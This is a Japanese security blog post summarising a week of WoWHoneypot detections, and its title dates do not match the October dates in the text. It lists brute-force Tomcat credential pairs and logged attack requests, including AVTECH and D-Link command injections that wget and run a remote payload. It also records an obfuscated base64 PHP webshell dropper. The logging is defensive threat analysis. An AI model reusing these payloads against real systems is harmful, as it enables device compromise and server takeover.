sec-chick Blog

サイバーセキュリティブログ

【ハニーポット】WoWHoneypot簡易分析(9/14-9/20)

現在、HoneytrapとHoneypotの両方を監視しているのですが、WoWHoneypotについてあまり纏めていなかったので、週次で記事を書いていこうと思います。

◾️WoWHoneypot
<検知傾向>

f:id:one-chick-sec:20181022140449p:plain
<検知数>

f:id:one-chick-sec:20181022140522p:plain

10/15の検知が非常に多く、検知内容の大半がTomcat Managerへのアクセスでした。
Basic認証を突破しようとする総当たり攻撃でしたが、ユーザー名とパスワードはよく利用されそうなものでした。
例:
123:1q2w3e4r
123:P@$$w0rd1234
123456:1qazXSW@
admin:123
admin:Pa$$w0rd@0
manager:P@$$w0rd1
role1:P@$$w0rd@123456
tomcat:nimda


<マルウェアダウンロード>
AVTECH IP Camera の脆弱性を狙った攻撃を検知していました。他のハニーポッターの方でも検知していたとの報告が多数上がっています。

ダウンロード先 ペイロード 検知数
hxxp://209[.]141[.]40[.]213/dlink GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://xxx.xxx.xxx.xxx/dlink%20-O%20-%3E%20/tmp/gexoe;sh%20/tmp/gexoe%27$ HTTP/1.1.Connection: keep-alive.Accept-Encoding: gzip, deflate.Accept: */*.User-Agent: Sefa.. 12
hxxp://209[.]141[.]40[.]213/avtech GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20hxxp://xxx.xxx.xxx.xxx/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1.User-Agent: Sefa.Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8.Accept-Language: en-GB,en;q=0.5.Accept-Encoding: gzip, deflate.Connection: close.. 13



<検知状況>
圧倒的にTomcat Managerへのアクセスが多かったです。

メソッド パス 検知数
GET /manager/html 4775
GET / 226
GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget hxxp://xxx.xxx.xxx.xxx/avtech -O niXd; chmod 777 niXd; sh niXd)&password=admin 12
POST /wls-wsat/CoordinatorPortType 9
GET hxxp://xxx.xxx.xxx.xxx/testget?q=23333&port=80 5
GET /admin/assets/js/views/login.js 4
GET /wls-wsat/CoordinatorPortType 4
HEAD / 4
GET /HNAP1/ 3
POST /GponForm/diag_Form?images/ 3
GET //MyAdmin/scripts/setup.php 2
GET //myadmin/scripts/setup.php 2
GET //phpMyAdmin/scripts/setup.php 2
GET //phpmyadmin/scripts/setup.php 2
GET //pma/scripts/setup.php 2
GET /admin/phpMyAdmin/index.php 2
GET /claroline/phpMyAdmin/index.php 2
GET /index/article/lists/cid/3 2
GET /login.cgi?cli=aa aa';wget hxxp://xxx.xxx.xxx.xxx/dlink -O -> /tmp/gexoe;sh /tmp/gexoe'$ 2
GET /muieblackcat 2
GET /phpMyAdmin/phpMyAdmin/index.php 2
GET /phpmyadmin/ 2
GET /tools/phpMyAdmin/index.php 2
GET /web/cgi-bin/hi3510/param.cgi?cmd=getp2pattr&cmd=getuserattr 2
GET /web/phpMyAdmin/index.php 2
GET /www/phpMyAdmin/index.php 2
PROPFIND / 2
CONNECT cn.bing.com:443 1
CONNECT www.baidu.com:443 1
GET /.bitcoin/wallet.dat 1
GET /.well-known/security.txt 1
GET //php/phpmyadmin/scripts/setup.php 1
GET //phpMyAdmin-2.6.9/scripts/setup.php 1
GET //phpMyAdmin-xxx.xxx.xxx.xxx/scripts/setup.php 1
GET /?XDEBUG_SESSION_START=phpstorm 1
GET /?a=<foo> 1
GET /PMA/index.php 1
GET /PMA2/index.php 1
GET /admin/PMA/index.php 1
GET /admin/index.php 1
GET /admin/mysql/index.php 1
GET /admin/mysql2/index.php 1
GET /admin/phpmyadmin/index.php 1
GET /admin/phpmyadmin2/index.php 1
GET /admin/pma/index.php 1
GET /ccvv 1
GET /cmx.php?cmd=echo "<?php \$func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';\$test=\$func('\$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e(\$x));');\$test('QHNlc3Npb25fc3RhcnQoKTtpZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpeyhzdWJzdHIoc2hhMShtZDUoQCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpJiYkX1NFU1NJT05bJ3RoZUNvZGUnXT10cmltKCRfUE9TVFsnY29kZSddKTt9aWYoaXNzZXQoJF9TRVNTSU9OWyd0aGVDb2RlJ10pKXtAZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VTU0lPTlsndGhlQ29kZSddKSk7fQ=='); ?>" >images.php & echo Hello, Peppa! 1
GET /cmx.php?cmd=echo ^<?php $func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';$test=$func('$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e($x));');$test('QHNlc3Npb25fc3RhcnQoKTtpZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpeyhzdWJzdHIoc2hhMShtZDUoQCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpJiYkX1NFU1NJT05bJ3RoZUNvZGUnXT10cmltKCRfUE9TVFsnY29kZSddKTt9aWYoaXNzZXQoJF9TRVNTSU9OWyd0aGVDb2RlJ10pKXtAZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VTU0lPTlsndGhlQ29kZSddKSk7fQ=='); ?^> >images.php & echo Hello, Peppa! 1
GET /console 1
GET /db/index.php 1
GET /dbadmin/index.php 1
GET /favicon.ico 1
GET /index.php 1
GET /login.cgi?cli=aa aa';wget hxxp://xxx.xxx.xxx.xxx/t.php'$ 1
GET /myadmin/index.php 1
GET /myadmin2/index.php 1
GET /mysql-admin/index.php 1
GET /mysql/index.php 1
GET /mysqladmin/index.php 1
GET /phpAdmin/index.php 1
GET /phpMyAbmin/index.php 1
GET /phpMyAdm1n/index.php 1
GET /phpMyAdmin   ---/index.php 1
GET /phpMyAdmin-4.4.0/index.php 1
GET /phpMyAdmin.old/index.php 1
GET /phpMyAdmin/index.php 1
GET /phpMyAdmin__/index.php 1
GET /phpMyAdminold/index.php 1
GET /phpMyAdmion/index.php 1
GET /phpMyadmi/index.php 1
GET /phpMyadmin_bak/index.php 1
GET /phpadmin/index.php 1
GET /phpma/index.php 1
GET /phpmyadm1n/index.php 1
GET /phpmyadmin 1
GET /phpmyadmin-old/index.php 1
GET /phpmyadmin/index.php 1
GET /phpmyadmin/phpmyadmin/index.php 1
GET /phpmyadmin0/index.php 1
GET /phpmyadmin1/index.php 1
GET /phpmyadmin2/index.php 1
GET /pma-old/index.php 1
GET /pma/index.php 1
GET /pmamy/index.php 1
GET /pmamy2/index.php 1
GET /pmd/index.php 1
GET /robots.txt 1
GET /shaAdmin/index.php 1
GET /sitemap.xml 1
GET /typo3/phpmyadmin/index.php 1
GET /upload/bank-icons/bank-gh.jpg 1
GET /upload/bank-icons/bank_16.png 1
GET /v/index.php 1
GET /wallet.dat 1
GET /wallets/wallet.dat 1
GET /webadmin/tpl/style.admin.css 1
GET /webdav/ 1
GET /xampp/phpmyadmin/index.php 1
GET /yealink/y000000000000.cfg 1
GET hxxp://api.ipify.org/ 1
GET hxxp://www.123cha.com/ 1
GET hxxp://www.ip.cn/ 1
GET hxxp://xxx.xxx.xxx.xxx/echo.php 1
GET hxxp://xxx.xxx.xxx.xxx:10083/index.php 1
HEAD /newhome/img/logo.png 1
HEAD /static/upload/20180921/th_317a3298794099e0bab477e4f3d732a4.png 1
OPTIONS /ipc$ 1
POST / 1
POST /cmx.php 1
POST /images.php 1
POST hxxp://check.proxyradar.com/azenv.php?auth=153944726797&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=153949072501&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=153978850135&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=153981707711&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=153984761625&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=153992111173&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=153994958159&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=153999669485&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=154007072173&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=154012893921&a=PSCN&i=2685440439&p=80 1




以上、簡易分析となります。